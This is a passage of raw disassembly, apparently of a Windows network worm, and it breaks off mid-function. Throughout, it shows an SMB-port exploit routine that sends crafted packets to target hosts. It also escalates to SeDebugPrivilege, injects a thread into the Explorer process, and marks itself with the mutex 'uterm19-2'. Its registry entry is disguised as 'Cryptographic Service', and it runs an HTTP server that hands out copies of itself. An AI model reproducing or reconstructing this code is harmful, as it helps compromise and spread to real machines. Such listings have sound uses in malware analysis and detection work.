		call	sub_31422CF0
		mov	eax, dword_31424C84
		push	ebx
		push	edi
		push	1
		pop	edi
		xor	ebx, ebx
		mov	[ebp+var_14], eax
		mov	eax, dword_31424C88
		push	ebx
		push	edi
		push	2
		mov	[ebp+var_10], eax
		mov	[ebp+var_C], edi
		call	dword_31421158	; socket
		cmp	eax, 0FFFFFFFFh
		mov	[ebp+var_4], eax
		jz	loc_31421D61
		push	esi
		mov	esi, [ebp+arg_0]
		push	1Dh
		push	esi
		call	dword_3142115C	; inet_ntoa
		push	eax
		lea	eax, [ebp+var_6C]
		push	eax
		call	dword_3142109C	; lstrcpyn
		lea	eax, [ebp+var_6C]
		push	eax
		lea	eax, [ebp+var_4C]
		push	offset loc_31424C78
		push	eax
		call	dword_3142111C	; wsprintfA
		add	esp, 0Ch
		xor	ecx, ecx
		lea	eax, [ebp+var_133]


loc_31421874:				; CODE XREF: sub_31421801+83j
		mov	dl, [ebp+ecx+var_4C]
		mov	[eax-1], dl
		and	byte ptr [eax],	0
		inc	ecx
		inc	eax
		inc	eax
		cmp	ecx, 28h
		jl	short loc_31421874
		push	60h
		lea	eax, [ebp+var_E4]
		push	offset dword_31424798
		push	eax
		call	sub_31422CE2	; memcpy
		lea	eax, [ebp+var_4C]
		push	eax
		call	sub_31422CDC	; strlen
		shl	eax, 1
		push	eax
		lea	eax, [ebp+var_134]
		push	eax
		lea	eax, [ebp+var_B4]
		push	eax
		call	sub_31422CE2	; memcpy
		add	esp, 1Ch
		lea	eax, [ebp+var_4C]
		push	9
		push	(offset	aC+3)
		push	eax
		call	sub_31422CDC	; strlen
		pop	ecx
		lea	eax, [ebp+eax*2+var_B5]
		push	eax
		call	sub_31422CE2	; memcpy
		lea	eax, [ebp+var_4C]
		push	eax
		call	sub_31422CDC	; strlen
		add	al, 1Ah
		push	edi
		shl	al, 1
		mov	[ebp+var_5], al
		lea	eax, [ebp+var_5]
		push	eax
		lea	eax, [ebp+var_E1]
		push	eax
		call	sub_31422CE2	; memcpy
		lea	eax, [ebp+var_4C]
		push	eax
		call	sub_31422CDC	; strlen
		shl	al, 1
		add	al, 9
		push	edi
		mov	[ebp+var_6], al
		lea	eax, [ebp+var_6]
		push	eax
		lea	eax, [ebp+var_B7]
		push	eax
		call	sub_31422CE2	; memcpy
		push	0E29h
		lea	eax, [ebp+var_1F28]
		push	31h
		push	eax
		call	sub_31422CD6	; memset
		push	10h
		lea	eax, [ebp+var_24]
		push	ebx
		push	eax
		call	sub_31422CD6	; memset
		add	esp, 44h
		mov	[ebp+var_24], 2
		push	1BDh
		call	dword_31421160	; htons
		mov	[ebp+var_22], ax
		lea	eax, [ebp+var_24]
		push	10h
		push	eax
		push	[ebp+var_4]
		mov	[ebp+var_20], esi
		call	dword_31421164	; connect
		cmp	eax, 0FFFFFFFFh
		jz	loc_31421D57
		mov	esi, dword_31421094
		mov	edi, 0C8h
		push	edi
		call	esi	; Sleep
		push	ebx
		mov	ebx, dword_31421168
		push	89h
		push	offset dword_31424580
		push	[ebp+var_4]
		call	ebx	; send
		push	edi
		call	esi	; Sleep
		push	0
		lea	eax, [ebp+var_774]
		push	640h
		push	eax
		push	[ebp+var_4]
		call	dword_3142116C	; recv
		cmp	eax, 0FFFFFFFFh
		jz	loc_31421D4C
		push	0
		push	0A8h
		push	offset dword_3142460C
		push	[ebp+var_4]
		call	ebx	; send
		push	edi
		call	esi	; Sleep
		push	0
		lea	eax, [ebp+var_774]
		push	640h
		push	eax
		push	[ebp+var_4]
		call	dword_3142116C	; recv
		cmp	eax, 0FFFFFFFFh
		jz	loc_31421D4C
		push	0
		push	0DEh
		push	offset dword_314246B8
		push	[ebp+var_4]
		call	ebx	; send
		push	edi
		call	esi	; Sleep
		push	0
		lea	eax, [ebp+var_774]
		push	640h
		push	eax
		push	[ebp+var_4]
		call	dword_3142116C	; recv
		cmp	eax, 0FFFFFFFFh
		jz	loc_31421D4C
		cmp	eax, 46h
		jl	loc_31421D4C
		cmp	[ebp+var_730], 31h
		jnz	loc_31421BF7
		and	[ebp+arg_0], 0
		push	7D0h
		lea	eax, [ebp+var_F44]
		push	90h
		push	eax
		call	sub_31422CD6	; memset
		add	esp, 0Ch
		push	offset byte_314242B8
		call	dword_31421084	; lstrlen
		push	eax
		lea	eax, [ebp+var_EA4]
		push	offset byte_314242B8
		push	eax
		call	sub_31422CE2	; memcpy
		add	esp, 0Ch
		lea	eax, [ebp+var_14]
		push	eax
		call	dword_31421084	; lstrlen
		push	eax
		lea	eax, [ebp+var_14]
		push	eax
		lea	eax, [ebp+var_788]
		push	eax
		call	sub_31422CE2	; memcpy
		mov	eax, dword_31424BBE
		add	esp, 0Ch
		mov	[ebp+var_798], eax


loc_31421A98:				; CODE XREF: sub_31421801+4E1j
		movsx	eax, [ebp+var_5]
		add	eax, 4
		push	0
		push	eax
		lea	eax, [ebp+var_E4]
		push	eax
		push	[ebp+var_4]
		call	ebx	; send
		push	edi
		call	esi	; Sleep
		push	0
		lea	eax, [ebp+var_774]
		push	640h
		push	eax
		push	[ebp+var_4]
		call	dword_3142116C	; recv
		cmp	eax, 0FFFFFFFFh
		jz	loc_31421D4C
		push	0
		push	68h
		push	offset dword_314247FC
		push	[ebp+var_4]
		call	ebx	; send
		push	edi
		call	esi	; Sleep
		push	0
		lea	eax, [ebp+var_774]
		push	640h
		push	eax
		push	[ebp+var_4]
		call	dword_3142116C	; recv
		cmp	eax, 0FFFFFFFFh
		jz	loc_31421D4C
		push	0
		push	0A0h
		push	offset dword_31424868
		push	[ebp+var_4]
		call	ebx	; send
		push	edi
		call	esi	; Sleep
		push	0
		lea	eax, [ebp+var_774]
		push	640h
		push	eax
		push	[ebp+var_4]
		call	dword_3142116C	; recv
		cmp	eax, 0FFFFFFFFh
		jz	loc_31421D4C
		cmp	[ebp+arg_0], 0
		jz	loc_31421CE7
		push	68h
		lea	eax, [ebp+var_89E4]
		push	offset dword_31424A20
		push	eax
		call	sub_31422CE2	; memcpy
		lea	eax, [ebp+var_4834]
		push	1B5Ah
		push	eax
		lea	eax, [ebp+var_897C]
		push	eax
		call	sub_31422CE2	; memcpy
		push	70h
		lea	eax, [ebp+var_690C]
		push	offset dword_31424A8C
		push	eax
		call	sub_31422CE2	; memcpy
		lea	eax, [ebp+var_37A0]
		push	0A5Eh
		push	eax
		lea	eax, [ebp+var_689C]
		push	eax
		call	sub_31422CE2	; memcpy
		push	84h
		lea	eax, [ebp+var_5DD8]
		push	offset dword_31424B00
		push	eax
		call	sub_31422CE2	; memcpy
		add	esp, 3Ch
		lea	eax, [ebp+var_89E4]
		push	0
		push	10FCh
		push	eax
		push	[ebp+var_4]
		call	ebx	; send
		push	edi
		call	esi	; Sleep
		push	0
		lea	eax, [ebp+var_774]
		push	640h
		push	eax
		push	[ebp+var_4]
		call	dword_3142116C	; recv
		cmp	eax, 0FFFFFFFFh
		jz	loc_31421D4C
		push	0
		push	0FDCh
		lea	eax, [ebp+var_690C]
		jmp	loc_31421D3F
; ---------------------------------------------------------------------------


loc_31421BF7:				; CODE XREF: sub_31421801+22Bj
		push	0DACh
		lea	eax, [ebp+var_2CD8]
		push	90h
		push	eax
		mov	[ebp+arg_0], 1
		call	sub_31422CD6	; memset
		push	4
		lea	eax, [ebp+var_24F4]
		push	offset dword_31424BF8
		push	eax
		call	sub_31422CE2	; memcpy
		push	offset byte_314242B8
		call	sub_31422CDC	; strlen
		push	eax
		lea	eax, [ebp+var_24E4]
		push	offset byte_314242B8
		push	eax
		call	sub_31422CE2	; memcpy
		push	4
		lea	eax, [ebp+var_21C0]
		push	offset loc_31424C70
		push	eax
		call	sub_31422CE2	; memcpy
		push	4
		lea	eax, [ebp+var_21BC]
		push	offset dword_31424BF8
		push	eax
		call	sub_31422CE2	; memcpy
		add	esp, 40h
		push	offset byte_314242B8
		call	sub_31422CDC	; strlen
		push	eax
		lea	eax, [ebp+var_21B0]
		push	offset byte_314242B8
		push	eax
		call	sub_31422CE2	; memcpy
		add	esp, 10h
		xor	ecx, ecx
		lea	eax, [ebp+var_4833]


loc_31421C93:				; CODE XREF: sub_31421801+4A8j
		mov	dl, [ebp+ecx+var_2CD8]
		mov	[eax-1], dl
		and	byte ptr [eax],	0
		inc	ecx
		inc	eax
		inc	eax
		cmp	ecx, 0DACh
		jl	short loc_31421C93
		and	[ebp+var_2CDC],	0
		and	[ebp+var_2CDB],	0
		push	1C52h
		lea	eax, [ebp+var_89E4]
		push	31h
		push	eax
		call	sub_31422CD6	; memset
		push	1C52h
		lea	eax, [ebp+var_690C]
		push	31h
		push	eax
		call	sub_31422CD6	; memset
		add	esp, 18h
		jmp	loc_31421A98
; ---------------------------------------------------------------------------


loc_31421CE7:				; CODE XREF: sub_31421801+339j
		push	7Ch
		lea	eax, [ebp+var_1F28]
		push	offset dword_3142490C
		push	eax
		call	sub_31422CE2	; memcpy
		lea	eax, [ebp+var_F44]
		push	7D0h
		push	eax
		lea	eax, [ebp+var_1EAC]
		push	eax
		call	sub_31422CE2	; memcpy
		push	90h
		lea	eax, [ebp+var_16DC]
		push	offset dword_3142498C
		push	eax
		call	sub_31422CE2	; memcpy
		add	esp, 24h
		and	[ebp+var_1231],	0
		lea	eax, [ebp+var_1F28]
		push	0
		push	0CF8h


loc_31421D3F:				; CODE XREF: sub_31421801+3F1j
		push	eax
		push	[ebp+var_4]
		call	ebx	; send
		push	edi
		call	esi	; Sleep
		and	[ebp+var_C], 0


loc_31421D4C:				; CODE XREF: sub_31421801+1ADj
					; sub_31421801+1E1j ...
		push	2
		push	[ebp+var_4]
		call	dword_31421170	; shutdown


loc_31421D57:				; CODE XREF: sub_31421801+166j
		push	[ebp+var_4]
		call	dword_31421174	; closesocket
		pop	esi


loc_31421D61:				; CODE XREF: sub_31421801+37j
		mov	eax, [ebp+var_C]
		pop	edi
		pop	ebx
		leave
		retn
sub_31421801	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_31421D68	proc near		; CODE XREF: UPX0:loc_31422376p

var_1C		= dword	ptr -1Ch
var_18		= byte ptr -18h
var_10		= dword	ptr -10h
var_C		= dword	ptr -0Ch
var_8		= dword	ptr -8
var_4		= dword	ptr -4

		push	ebp
		mov	ebp, esp
		sub	esp, 1Ch
		push	esi
		push	edi
		push	offset aAdvapi32 ; "advapi32"
		call	dword_314210A8	; LoadLibraryA
		mov	esi, dword_314210A4
		mov	edi, eax
		push	offset aOpenprocesstok ; "OpenProcessToken"
		push	edi
		call	esi	; GetProcAddress
		test	eax, eax
		mov	[ebp+var_4], eax
		jz	short loc_31421DEC
		push	offset aLookupprivileg ; "LookupPrivilegeValueA"
		push	edi
		call	esi	; GetProcAddress
		test	eax, eax
		mov	[ebp+var_8], eax
		jz	short loc_31421DEC
		push	offset aAdjusttokenpri ; "AdjustTokenPrivileges"
		push	edi
		call	esi	; GetProcAddress
		mov	esi, eax
		test	esi, esi
		jz	short loc_31421DEC
		lea	eax, [ebp+var_C]
		push	eax
		push	20h
		call	dword_314210A0	; GetCurrentProcess
		push	eax
		call	[ebp+var_4]
		lea	eax, [ebp+var_18]
		mov	[ebp+var_1C], 1
		push	eax
		push	offset aSedebugprivile ; "SeDebugPrivilege"
		push	0
		mov	[ebp+var_10], 2
		call	[ebp+var_8]
		push	0
		push	0
		lea	eax, [ebp+var_1C]
		push	10h
		push	eax
		push	0
		push	[ebp+var_C]
		call	esi	; GetProcAddress


loc_31421DEC:				; CODE XREF: sub_31421D68+28j
					; sub_31421D68+37j ...
		pop	edi
		pop	esi
		leave
		retn
sub_31421D68	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_31421DF0	proc near		; CODE XREF: UPX0:3142238Ap

var_18		= byte ptr -18h
var_14		= dword	ptr -14h
var_10		= dword	ptr -10h
var_C		= dword	ptr -0Ch
var_8		= dword	ptr -8
var_4		= dword	ptr -4
arg_0		= dword	ptr  8

		push	ebp
		mov	ebp, esp
		sub	esp, 18h
		mov	ecx, dword_31425000
		and	[ebp+var_4], 0
		push	ebx
		push	esi
		mov	eax, [ecx+3Ch]
		push	edi
		add	eax, ecx
		push	offset aKernel32 ; "kernel32"
		mov	ecx, [eax+34h]
		mov	edi, [eax+50h]
		mov	[ebp+var_C], ecx
		call	dword_314210B4	; GetModuleHandleA
		mov	esi, dword_314210A4
		mov	ebx, eax
		push	offset aVirtualallocex ; "VirtualAllocEx"
		push	ebx
		call	esi	; GetProcAddress
		test	eax, eax
		mov	[ebp+var_10], eax
		jnz	short loc_31421E37


loc_31421E33:				; CODE XREF: sub_31421DF0+54j
		push	1
		jmp	short loc_31421E88
; ---------------------------------------------------------------------------


loc_31421E37:				; CODE XREF: sub_31421DF0+41j
		push	offset aCreateremoteth ; "CreateRemoteThread"
		push	ebx
		call	esi	; GetProcAddress
		test	eax, eax
		mov	[ebp+var_14], eax
		jz	short loc_31421E33
		push	0
		push	offset aShell_traywnd ;	"Shell_TrayWnd"
		call	dword_31421110	; FindWindowA
		test	eax, eax
		jnz	short loc_31421E65
		call	dword_31421114	; GetForegroundWindow
		test	eax, eax
		jnz	short loc_31421E65
		push	2
		jmp	short loc_31421E88
; ---------------------------------------------------------------------------


loc_31421E65:				; CODE XREF: sub_31421DF0+65j
					; sub_31421DF0+6Fj
		lea	ecx, [ebp+var_8]
		push	ecx
		push	eax
		call	dword_31421118	; GetWindowThreadProcessId
		push	[ebp+var_8]
		push	0
		push	42Ah
		call	dword_314210B0	; OpenProcess
		mov	ebx, eax
		test	ebx, ebx
		jnz	short loc_31421E8B
		push	3


loc_31421E88:				; CODE XREF: sub_31421DF0+45j
					; sub_31421DF0+73j
		pop	eax
		jmp	short loc_31421EF6
; ---------------------------------------------------------------------------


loc_31421E8B:				; CODE XREF: sub_31421DF0+94j
		push	4
		push	3000h
		push	edi
		push	[ebp+var_C]
		push	ebx
		call	[ebp+var_10]
		mov	esi, dword_3142107C
		test	eax, eax
		jz	short loc_31421EE9
		lea	ecx, [ebp+var_10]
		push	ecx
		push	edi
		push	eax
		push	eax
		push	ebx
		call	dword_314210AC	; WriteProcessMemory
		push	dword_31424FF4
		call	esi	; CloseHandle
		lea	eax, [ebp+var_18]
		xor	edi, edi
		push	eax
		push	edi
		push	1
		push	[ebp+arg_0]
		push	edi
		push	edi
		push	ebx
		call	[ebp+var_14]
		cmp	eax, edi
		jz	short loc_31421ED5
		push	eax
		call	esi	; CloseHandle
		jmp	short loc_31421EF0
; ---------------------------------------------------------------------------


loc_31421ED5:				; CODE XREF: sub_31421DF0+DEj
		push	offset aUterm192 ; "uterm19-2"
		call	sub_31421F29
		pop	ecx
		mov	[ebp+var_4], 5
		jmp	short loc_31421EF0
; ---------------------------------------------------------------------------


loc_31421EE9:				; CODE XREF: sub_31421DF0+B2j
		mov	[ebp+var_4], 4


loc_31421EF0:				; CODE XREF: sub_31421DF0+E3j
					; sub_31421DF0+F7j
		push	ebx
		call	esi	; CloseHandle
		mov	eax, [ebp+var_4]


loc_31421EF6:				; CODE XREF: sub_31421DF0+99j
		pop	edi
		pop	esi
		pop	ebx
		leave
		retn
sub_31421DF0	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_31421EFB	proc near		; CODE XREF: sub_314221C4+Bp
					; UPX0:3142234Cp ...

var_8		= dword	ptr -8
var_4		= dword	ptr -4

		push	ebp
		mov	ebp, esp
		push	ecx
		push	ecx
		push	ebx
		push	esi
		push	edi
		pusha
		rdtsc
		mov	[ebp+var_8], eax
		popa
		mov	[ebp+var_4], esp
		call	dword_314210B8	; GetTickCount
		mov	ecx, [ebp+var_4]
		imul	ecx, [ebp+var_8]
		add	eax, ecx
		push	eax
		call	dword_314210EC	; srand
		pop	ecx
		pop	edi
		pop	esi
		pop	ebx
		leave
		retn
sub_31421EFB	endp


; =============== S U B	R O U T	I N E =======================================



sub_31421F29	proc near		; CODE XREF: sub_31421DF0+EAp
					; UPX0:31422356p ...

arg_0		= dword	ptr  4

		push	[esp+arg_0]
		push	1
		push	0
		call	dword_314210BC	; CreateMutexA
		retn
sub_31421F29	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_31421F38	proc near		; CODE XREF: sub_314223B2+155p
					; sub_314223B2+160p ...

arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch

		push	ebp
		mov	ebp, esp
		lea	eax, [ebp+arg_4]
		push	eax
		xor	eax, eax
		push	eax
		push	[ebp+arg_4]
		push	[ebp+arg_0]
		push	eax
		push	eax
		call	dword_314210C0	; CreateThread
		pop	ebp
		retn
sub_31421F38	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_31421F52	proc near		; CODE XREF: sub_314221C4+12Cp
					; sub_314225C3+5Ap ...

arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch

		push	ebp
		mov	ebp, esp
		lea	eax, [ebp+arg_4]
		push	eax
		xor	eax, eax
		push	eax
		push	[ebp+arg_4]
		push	[ebp+arg_0]
		push	eax
		push	eax
		call	dword_314210C0	; CreateThread
		push	eax
		call	dword_3142107C	; CloseHandle
		pop	ebp
		retn
sub_31421F52	endp


; =============== S U B	R O U T	I N E =======================================



sub_31421F73	proc near		; CODE XREF: sub_314211A0+68p
					; sub_31422A9B+3Bp ...

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8

		push	ebx
		mov	ebx, [esp+4+arg_0]
		push	esi
		push	edi
		mov	edi, [esp+0Ch+arg_4]
		xor	esi, esi
		test	edi, edi
		jle	short loc_31421F9B


loc_31421F84:				; CODE XREF: sub_31421F73+26j
		call	dword_314210FC	; rand
		push	1Ah
		cdq
		pop	ecx
		idiv	ecx
		add	dl, 61h
		mov	[esi+ebx], dl
		inc	esi
		cmp	esi, edi
		jl	short loc_31421F84


loc_31421F9B:				; CODE XREF: sub_31421F73+Fj
		and	byte ptr [ebx+edi], 0
		pop	edi
		pop	esi
		pop	ebx
		retn
sub_31421F73	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_31421FA3	proc near		; CODE XREF: sub_314211A0+105p

var_54		= dword	ptr -54h
var_24		= word ptr -24h
var_10		= dword	ptr -10h
var_C		= dword	ptr -0Ch
arg_0		= dword	ptr  8
arg_4		= word ptr  0Ch

		push	ebp
		mov	ebp, esp
		sub	esp, 54h
		push	esi
		push	edi
		push	44h
		xor	esi, esi
		pop	edi
		lea	eax, [ebp+var_54]
		push	edi
		push	esi
		push	eax
		call	sub_31422CD6	; memset
		mov	ax, [ebp+arg_4]
		add	esp, 0Ch
		mov	[ebp+var_24], ax
		lea	eax, [ebp+var_10]
		push	eax
		lea	eax, [ebp+var_54]
		push	eax
		push	esi
		push	esi
		push	esi
		push	esi
		push	esi
		push	esi
		mov	[ebp+var_54], edi
		push	[ebp+arg_0]
		push	esi
		call	dword_314210C4	; CreateProcessA
		push	[ebp+var_C]
		mov	esi, dword_3142107C
		mov	edi, eax
		call	esi	; CloseHandle
		push	[ebp+var_10]
		call	esi	; CloseHandle
		mov	eax, edi
		pop	edi
		pop	esi
		leave
		retn
sub_31421FA3	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_31421FF9	proc near		; CODE XREF: sub_3142264B+3Ep
					; sub_31422712+7p ...

var_34		= byte ptr -34h

		push	ebp
		mov	ebp, esp
		sub	esp, 34h
		lea	eax, [ebp+var_34]
		push	31h
		push	eax
		call	dword_3142114C	; gethostname
		cmp	eax, 0FFFFFFFFh
		jnz	short loc_3142201A
		call	dword_31421150	; WSAGetLastError
		xor	eax, eax
		leave
		retn
; ---------------------------------------------------------------------------


loc_3142201A:				; CODE XREF: sub_31421FF9+15j
		lea	eax, [ebp+var_34]
		push	eax
		call	dword_31421154	; gethostbyname
		test	eax, eax
		jnz	short loc_3142202F
		mov	eax, 100007Fh
		leave
		retn
; ---------------------------------------------------------------------------


loc_3142202F:				; CODE XREF: sub_31421FF9+2Dj
		mov	eax, [eax+0Ch]
		mov	eax, [eax]
		mov	eax, [eax]
		leave
		retn
sub_31421FF9	endp


; =============== S U B	R O U T	I N E =======================================



sub_31422038	proc near		; CODE XREF: sub_314216A2+12p
					; sub_3142255F+22p ...

var_4		= byte ptr -4

		push	ecx
		lea	eax, [esp+4+var_4]
		push	0
		push	eax
		call	dword_31421130	; InternetGetConnectedState
		neg	eax
		sbb	eax, eax
		neg	eax
		pop	ecx
		retn
sub_31422038	endp


; =============== S U B	R O U T	I N E =======================================



sub_3142204E	proc near		; CODE XREF: sub_314223B2+E6p

arg_0		= dword	ptr  4

		push	[esp+arg_0]
		push	0
		push	2
		call	dword_314210CC	; OpenEventA
		test	eax, eax
		jz	short locret_31422067
		push	eax
		call	dword_314210C8	; SetEvent

locret_31422067:			; CODE XREF: sub_3142204E+10j
		retn
sub_3142204E	endp


; =============== S U B	R O U T	I N E =======================================



sub_31422068	proc near		; CODE XREF: sub_314216A2+68p
		push	esi
		mov	esi, dword_314210FC
		push	edi
		call	esi	; rand
		mov	edi, eax
		shl	edi, 10h
		call	esi	; rand
		or	eax, edi
		pop	edi
		pop	esi
		retn
sub_31422068	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_3142207E	proc near		; DATA XREF: sub_314221C4+127o

var_200		= byte ptr -200h
var_100		= byte ptr -100h
arg_0		= dword	ptr  8

		push	ebp
		mov	ebp, esp
		sub	esp, 200h
		push	ebx
		mov	ebx, [ebp+arg_0]
		push	esi
		push	edi
		xor	edi, edi
		lea	eax, [ebp+var_100]
		push	edi
		push	100h
		push	eax
		push	ebx
		call	dword_3142116C	; recv
		cmp	eax, 0FFFFFFFFh
		jnz	short loc_314220AF
		push	1
		jmp	loc_3142216A
; ---------------------------------------------------------------------------


loc_314220AF:				; CODE XREF: sub_3142207E+28j
		mov	esi, dword_31421104
		lea	eax, [ebp+var_100]
		push	offset aGet	; "GET"
		push	eax
		call	esi	; strstr
		pop	ecx
		test	eax, eax
		pop	ecx
		jz	loc_3142217A
		lea	eax, [ebp+var_100]
		push	offset dword_314241F0
		push	eax
		call	esi	; strstr
		pop	ecx
		test	eax, eax
		pop	ecx
		jz	loc_3142217A
		mov	esi, dword_31421168
		push	0
		push	3Dh
		push	offset aHttp1_1200OkCo ; "HTTP/1.1 200 OK\r\nContent-Type: applicat"...
		push	ebx
		call	esi	; send
		push	dword_31424FF0
		lea	eax, [ebp+var_200]
		push	offset aContentLengthU ; "Content-Length: %u\r\n\r\n"
		push	eax
		call	dword_3142111C	; wsprintfA
		add	esp, 0Ch
		lea	eax, [ebp+var_200]
		push	0
		push	eax
		call	sub_31422CDC	; strlen
		pop	ecx
		push	eax
		lea	eax, [ebp+var_200]
		push	eax
		push	ebx
		call	esi	; send


loc_3142212C:				; CODE XREF: sub_3142207E+E8j
		mov	eax, dword_31424FF0
		mov	ecx, 1000h
		sub	eax, edi
		cmp	eax, ecx
		jb	short loc_3142213E
		mov	eax, ecx


loc_3142213E:				; CODE XREF: sub_3142207E+BCj
		test	eax, eax
		jz	short loc_3142216D
		push	0
		push	eax
		mov	eax, dword_31424FE8
		add	eax, edi
		push	eax
		push	ebx
		call	esi	; send
		cmp	eax, 0FFFFFFFFh
		jz	short loc_31422168
		cmp	eax, 1000h
		jb	short loc_3142216D
		push	64h
		add	edi, eax
		call	dword_31421094	; Sleep
		jmp	short loc_3142212C
; ---------------------------------------------------------------------------


loc_31422168:				; CODE XREF: sub_3142207E+D5j
		push	2


loc_3142216A:				; CODE XREF: sub_3142207E+2Cj
		pop	eax
		jmp	short loc_314221BD
; ---------------------------------------------------------------------------


loc_3142216D:				; CODE XREF: sub_3142207E+C2j
					; sub_3142207E+DCj
		push	offset dword_31424FEC
		call	dword_314210D4	; InterlockedIncrement
		jmp	short loc_31422198
; ---------------------------------------------------------------------------


loc_3142217A:				; CODE XREF: sub_3142207E+49j
					; sub_3142207E+61j
		mov	esi, dword_31421168
		push	0
		push	15h
		push	offset aHttp1_1200Ok ; "HTTP/1.1 200 OK\r\n\r\n\r\n"
		push	ebx
		call	esi	; send
		push	0
		push	3
		push	offset dword_31424D3C
		push	ebx
		call	esi	; send


loc_31422198:				; CODE XREF: sub_3142207E+FAj
		push	7D0h
		call	dword_31421094	; Sleep
		push	2
		push	ebx
		call	dword_31421170	; shutdown
		push	ebx
		call	dword_31421174	; closesocket
		push	0
		call	dword_314210D0	; ExitThread
		xor	eax, eax


loc_314221BD:				; CODE XREF: sub_3142207E+EDj
		pop	edi
		pop	esi
		pop	ebx
		leave
		retn	4
sub_3142207E	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_314221C4	proc near		; DATA XREF: sub_314223B2+150o

var_130		= byte ptr -130h
var_28		= byte ptr -28h
var_18		= word ptr -18h
var_16		= word ptr -16h
var_14		= dword	ptr -14h
var_8		= dword	ptr -8
var_4		= dword	ptr -4

		push	ebp
		mov	ebp, esp
		sub	esp, 130h
		push	ebx
		push	edi
		call	sub_31421EFB
		lea	eax, [ebp+var_130]
		push	104h
		push	eax
		push	offset aCryptographicS ; "Cryptographic	Service"
		xor	ebx, ebx
		push	offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
		push	80000002h
		mov	dword_31424FEC,	ebx
		call	sub_31422882
		add	esp, 14h
		test	eax, eax
		jnz	loc_314222F9
		push	esi
		push	ebx
		push	ebx
		push	3
		push	ebx
		push	1
		lea	eax, [ebp+var_130]
		push	80000000h
		push	eax
		call	dword_31421080	; CreateFileA
		mov	esi, eax
		cmp	esi, 0FFFFFFFFh
		jnz	short loc_31422230
		push	1
		call	dword_314210D0	; ExitThread


loc_31422230:				; CODE XREF: sub_314221C4+62j
		push	ebx
		push	esi
		call	dword_314210DC	; GetFileSize
		push	eax
		mov	dword_31424FF0,	eax
		call	sub_31422CA5
		pop	ecx
		mov	dword_31424FE8,	eax
		lea	ecx, [ebp+var_4]
		push	ebx
		push	ecx
		push	dword_31424FF0
		push	eax
		push	esi
		call	dword_314210D8	; ReadFile
		mov	eax, [ebp+var_4]
		push	esi
		mov	dword_31424FF0,	eax
		call	dword_3142107C	; CloseHandle
		push	ebx
		push	1
		push	2
		call	dword_31421158	; socket
		push	10h
		mov	edi, eax
		pop	esi
		lea	eax, [ebp+var_18]
		push	esi
		push	ebx
		push	eax
		call	sub_31422CD6	; memset
		add	esp, 0Ch
		mov	[ebp+var_18], 2
		mov	[ebp+var_14], ebx


loc_31422292:				; CODE XREF: sub_314221C4+E5j
					; sub_314221C4+EDj ...
		call	dword_314210FC	; rand
		add	eax, 7D0h
		and	eax, 1FFFh
		cmp	al, bl
		mov	dword_31424FFC,	eax
		jz	short loc_31422292
		xor	ecx, ecx
		mov	cl, ah
		test	cl, cl
		jz	short loc_31422292
		push	eax
		call	dword_31421160	; htons
		mov	[ebp+var_16], ax
		lea	eax, [ebp+var_18]
		push	esi
		push	eax
		push	edi
		call	dword_31421140	; bind
		test	eax, eax
		jnz	short loc_31422292
		push	64h
		push	edi
		call	dword_31421144	; listen
		mov	[ebp+var_8], esi
		pop	esi


loc_314222DB:				; CODE XREF: sub_314221C4+133j
		lea	eax, [ebp+var_8]
		push	eax
		lea	eax, [ebp+var_28]
		push	eax
		push	edi
		call	dword_31421148	; accept
		push	eax
		push	offset sub_3142207E
		call	sub_31421F52
		pop	ecx
		pop	ecx
		jmp	short loc_314222DB
; ---------------------------------------------------------------------------


loc_314222F9:				; CODE XREF: sub_314221C4+3Dj
		push	ebx
		call	dword_314210D0	; ExitThread
		pop	edi
		xor	eax, eax
		pop	ebx
		leave
		retn	4
sub_314221C4	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_31422308	proc near		; CODE XREF: sub_314223B2:loc_314224FCp

var_190		= byte ptr -190h

		push	ebp
		mov	ebp, esp
		sub	esp, 190h
		lea	eax, [ebp+var_190]
		push	esi
		mov	esi, dword_3142113C
		push	eax
		push	2
		call	esi	; WSAStartup
		lea	eax, [ebp+var_190]
		push	eax
		push	102h
		call	esi	; WSAStartup
		pop	esi
		leave
		retn
sub_31422308	endp

; ---------------------------------------------------------------------------


loc_31422334:				; CODE XREF: UPX1:31427D08j
		push	0
		call	dword_314210B4	; GetModuleHandleA
		push	offset aFtpupd_exe ; "ftpupd.exe"
		mov	dword_31425000,	eax
		call	dword_31421074	; DeleteFileA
		call	sub_31421EFB
		push	offset aUterm192 ; "uterm19-2"
		call	sub_31421F29
		pop	ecx
		mov	dword_31424FF4,	eax
		call	dword_314210E4	; RtlGetLastWin32Error
		cmp	eax, 0B7h
		jnz	short loc_31422376
		push	1
		call	dword_314210E0	; ExitProcess


loc_31422376:				; CODE XREF: UPX0:3142236Cj
		call	sub_31421D68
		call	sub_314229E6
		call	sub_31422B67
		push	offset sub_314223B2
		call	sub_31421DF0
		test	eax, eax
		pop	ecx
		jz	short loc_3142239B
		push	0
		call	sub_314223B2


loc_3142239B:				; CODE XREF: UPX0:31422392j
		xor	eax, eax
		retn

; =============== S U B	R O U T	I N E =======================================



sub_3142239E	proc near		; CODE XREF: sub_314223B2:loc_31422525p
					; sub_3142255F:loc_31422578p ...
		push	0
		push	dword_31424FF8
		call	dword_31421070	; WaitForSingleObject
		neg	eax
		sbb	eax, eax
		inc	eax
		retn
sub_3142239E	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_314223B2	proc near		; CODE XREF: UPX0:31422396p
					; DATA XREF: UPX0:31422385o

var_74		= dword	ptr -74h
var_70		= dword	ptr -70h
var_6C		= dword	ptr -6Ch
var_68		= dword	ptr -68h
var_64		= dword	ptr -64h
var_60		= dword	ptr -60h
var_5C		= dword	ptr -5Ch
var_58		= dword	ptr -58h
var_54		= dword	ptr -54h
